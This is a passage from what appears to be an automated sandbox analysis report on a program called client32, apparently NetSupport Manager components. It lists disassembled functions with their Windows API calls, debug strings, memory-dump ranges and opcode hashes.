                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: IsA()$NSMString.cpp
                                                                                                • API String ID: 269201875-2362537096
                                                                                                • Opcode ID: 68d67adba3b792a3b76b297a6ece0cba9d6ec4ae3df73479a5d21533772aba25
                                                                                                • Instruction ID: 17388535e6c5badee4eb9af04060c7a893d398ad281bb0e33101b8b46c6c7982
                                                                                                • Opcode Fuzzy Hash: 68d67adba3b792a3b76b297a6ece0cba9d6ec4ae3df73479a5d21533772aba25
                                                                                                • Instruction Fuzzy Hash: 6CD023FA82450117C55CDF547C01D4933840F0522CF448475FF9C6FA40F7105C4711A2
                                                                                                Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindWindowA.USER32 ref: 1111316A
                                                                                                • SendMessageA.USER32(00000000,00000414,00000000,00000000,?,1111EE7B,00000000,00000000), ref: 11113180
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FindMessageSendWindow
                                                                                                • String ID: MSOfficeWClass
                                                                                                • API String ID: 1741975844-970895155
                                                                                                • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                                • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                                Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DestroyWindow.USER32 ref: 1115F338
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                                • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                • API String ID: 1417657345-2201682149
                                                                                                • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                                • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                                Function 69CFDAC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(00000000), ref: 69CFDAE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event
                                                                                                • String ID: Refcount.cpp$this->hReadyEvent
                                                                                                • API String ID: 4201588131-2118820724
                                                                                                • Opcode ID: 572918dc6c52284db6772a373ad46de79f3e5ec017f82c5883d293ff7761300f
                                                                                                • Instruction ID: 3b659e604659da12b9dc511cb032499690d92fef483db57957e7997741f8ed9a
                                                                                                • Opcode Fuzzy Hash: 572918dc6c52284db6772a373ad46de79f3e5ec017f82c5883d293ff7761300f
                                                                                                • Instruction Fuzzy Hash: 37D02271804210AFD620CB14F906BCA72A88F40759F008039F30A62808E7A0A84E8B88
                                                                                                Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                • m_hWnd, xrefs: 1101D3A3
                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                • API String ID: 1590435379-2830328467
                                                                                                • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                                • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                                • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384